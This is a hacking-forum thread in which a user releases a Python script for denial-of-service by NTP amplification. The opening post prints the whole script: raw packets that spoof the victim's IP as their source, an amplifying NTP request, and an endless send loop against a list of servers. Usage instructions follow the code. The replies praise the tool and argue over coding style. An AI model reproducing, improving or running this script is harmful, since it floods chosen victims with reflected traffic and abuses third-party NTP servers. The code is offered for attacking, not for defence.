chevron_left chevron_right
Login Register invert_colors photo_library


Stay updated and chat with others! - Join the Discord!
Thread Rating:
  • 0 Vote(s) - 0 Average


[Release] MuchNTP - DOS with NTP amplification filter_list
Author
Message
[Release] MuchNTP - DOS with NTP amplification #1
I recently stumbled over a very well written tutorial by Agent Cipher that explains NTP amplification, however, I was sad to see that that there was no script for python 3.x that utilized it. So, I cranked this piece of shit out in a few hours, ta-da!

Code:
from multiprocessing import Process
import socket
from sys import *
from struct import *

###############################
##  Script by 3SidedSquare   ##
## From a tutorial writen by ##
##  Sinisterly user Cipher   ##
## You may copy / paste this ##
##But keep this block intact.##
###############################
              
class targetOne():

    def __init__(self, target, victim):
        payload = b'\x17\x00\x03\x2a\x00\x00\x00\x00'
        gid = 54321

        s = socket.socket(socket.AF_INET,socket.SOCK_RAW,socket.IPPROTO_RAW) #Create the socket
        
        ipheader = pack('!BBHHHBBH4s4s',
              85, #IHL version
              0, #Type of service
              0, #Total length, will automatically fill in correct lenghth
              gid, #Global id of this packet
              0, #Fragment offset
              255, #Time to live
              socket.IPPROTO_UDP, #Protocol
              0, #Header checksum, will automatically fill
              socket.inet_aton(victim), #Spoof the victim's ip as our own, so data gets sent there
              socket.inet_aton(target)) #The NTP server
    
        udpheader = pack('!HHHH',
                         0, #Source port
                         123, #Destination port for NTP
                         0, #Length, automatically filled in
                         0) #Checksum, filled in later

        pseudoheader = pack('!4s4sBBH',
                           socket.inet_aton(victim), #Spoof source address
                           socket.inet_aton(target), #The NTP server
                           0, #Placeholder for length
                           socket.IPPROTO_UDP,
                           len(udpheader+payload)) #Length of the packet

        brokepacket = pseudoheader + udpheader + payload #create an incorrect packet
                          
        check = self.checksum(brokepacket) #Get the checksum

        udpheader = pack('!HHHH',
                         0,
                         123,
                         0,
                         check) #Re-create the udp packet with the correct checksum

        packet = ipheader + udpheader + payload #The final packet to send

        print("Sending packet:\n" + str(packet))
        print("Attacking!!!\n press ctrl+c to stop")

        while(True):
            s.sendto(packet,(target,0)) #Send the packet

    ##Checksum function taken from http://www.binarytides.com/
    def checksum(self, msg):
        s = 0
        for i in range(0,len(msg),2):
            par1 = ord(chr(msg[i]))
            par2 = ord(chr(msg[i+1]))
            w=par1 + (par2 << 8)
            s=s+w
        s=(s>>16)+(s&0xffff);
        s=s+(s>>16);
        s=~s&0xffff
        return s

class ntpspam():

    def f(self, victim = None):
        if(not victim):
            victim = input("IP of victim:\n")
        ntpfilename = input("Name of file containting ntp servers\n")
        ntpfile = open(ntpfilename, 'rb', buffering = 0)
        done = False
        ip = ''
        returned = False
        x = 0
        processes = {}
        while(not done):
            char = ntpfile.read(1)
            char = str(char)[2:-1]
            if(char == '\\n' and returned):
                print("useing ntp " + ip)
                returned = False
                p = Process(target = self.makeOne, args=(ip,))
                p.start()
                processes[x] = p
                x += 1
                ip = ''
            elif(char == '\\r'):
                returned = True
            elif(not char == ''):
                ip += char
            else:
                done = True
                print("done,useing ntp " + ip)
                returned = False
                p = Process(target = self.makeOne, args=(ip,victim,))
                p.start()
                processes[x] = p
                x += 1
                ip = ''
        ntpfile.close()
        
    def makeOne(self, ip, victim):
        one = targetOne(ip, victim)

if(__name__ == '__main__'):
    try:
        n = ntpspam()
        n.f()
    except Exception as e:
        crash = open('crash.log', 'w')
        crash.write(str(e))
        crash.close()

Vulnerable NTP servers must be stored in a text file in the same directory as the script.
Each server must be on a separate line.
You need admin privileges to run the script.
My script does not check to see if the server is vulnerable.

Comments, criticism, feedback ect.

P.S.
Why am I not allowed to attach files with a .py extension?
[Image: jWSyE88.png]

Reply

RE: [Release] MuchNTP - DOS with NTP amplification #2
Good job on the script, glad you thought my tutorial was useful Smile.

Reply

RE: [Release] MuchNTP - DOS with NTP amplification #3
(03-14-2014, 05:28 AM)Cipher Wrote: Good job on the script, glad you thought my tutorial was useful Smile.

Thanks Tongue, it was an interesting one for sure, I've never built packets from the ground-up like this before.
[Image: jWSyE88.png]

Reply

RE: [Release] MuchNTP - DOS with NTP amplification #4
Looks really good mate. I actually might look into NTP amplification now.

Reply

RE: [Release] MuchNTP - DOS with NTP amplification #5
1. You don't need to comment everything you do. No comments is better than overcommenting.

2. You definitely do not need a class for this.
micrictor@creep.im

Reply

RE: [Release] MuchNTP - DOS with NTP amplification #6
(03-15-2014, 12:15 AM)w00t Wrote: 1. You don't need to comment everything you do. No comments is better than overcommenting.

2. You definitely do not need a class for this.

1. I beg to differ.

2. If you want it to be a linear script, I'm disinclined for the following reason: multiprocessing necessitates the use of at least one function, additionally, I have a checksum function that only needs to be used when constructing packets. Having only 2 functions would be all well and good, but I originally intended to create a GUI for the script (still do, at some point...), so you might see how having
GUI <--> process manager class <--> spammer process
might be more organized.

Also, congrats on S elite
[Image: jWSyE88.png]

Reply

RE: [Release] MuchNTP - DOS with NTP amplification #7
1. The entire industry of software engineering agrees with me. If the comments are so superflous I can safely ignore over 50% of them, its just unneeded clutter, and reduces readability.

2. But why do those functions need to be in a class? If they're function-oriented with a __name__ conditional( as you already have ) you could use it as a module for your further projects.
micrictor@creep.im

Reply

RE: [Release] MuchNTP - DOS with NTP amplification #8
(03-15-2014, 03:22 AM)w00t Wrote: 1. The entire industry of software engineering agrees with me. If the comments are so superflous I can safely ignore over 50% of them, its just unneeded clutter, and reduces readability.

2. But why do those functions need to be in a class? If they're function-oriented with a __name__ conditional( as you already have ) you could use it as a module for your further projects.

1.Hardly superfluous, if I didn't comment each number, I would have made constants for them all. I refuse to have "magic numbers" floating around my code. Besides, who is to say they're superfluous? If you instead wanted to adapt this script for some tcp protocol, the comments in creating udpheader would serve you well, if you wanted to use ipv6 instead of ipv4, without the comments there you would need to completely re-write ipheader. And its not like I commented every line, in my opinion the comments are a little lacking. Only the beginning where I need to keep track of what all these numbers mean is it so heavily documented.

2.They are in classes because it helps to keep everything organized, for the same reason you code in c++ instead of c. Anything can be done linearly, it's just harder to keep track of.
[Image: jWSyE88.png]

Reply

RE: [Release] MuchNTP - DOS with NTP amplification #9
(03-15-2014, 12:15 AM)w00t Wrote: 1. You don't need to comment everything you do. No comments is better than overcommenting.

2. You definitely do not need a class for this.

The first point is good advice. You should probably only comment a statement(s) if it/they are not unambiguous. I would try to avoid too many comments.

The second one is just nitpicking for no good reason. If he wants to take an Object-Oriented approach, then allow him to. In theory, you don't really /need/ a class for anything. Well, nothing that I know of, at least. Please, feel free to inform me if I'm wrong.

OOP can be viewed as a more organized way of programming and it can assist with portability (not across computer systems, but rather in terms of programming interfaces and libraries) and re-useability of code.

My point: I see no issue in the usage of OOP in this situation. It's a small script and it really exhibits no noticeable effect on the output from the user's POV. Besides, he's probably accustomed to OOP. It's not a big deal.


On Topic: I haven't personally tried out this script, but it appears to be a good contribution to the forum. Good work.

Reply

RE: [Release] MuchNTP - DOS with NTP amplification #10
Good job! Could you explain how you would check to see is a server is vulnerable? What would a program do to do this?

Reply






Users browsing this thread: 1 Guest(s)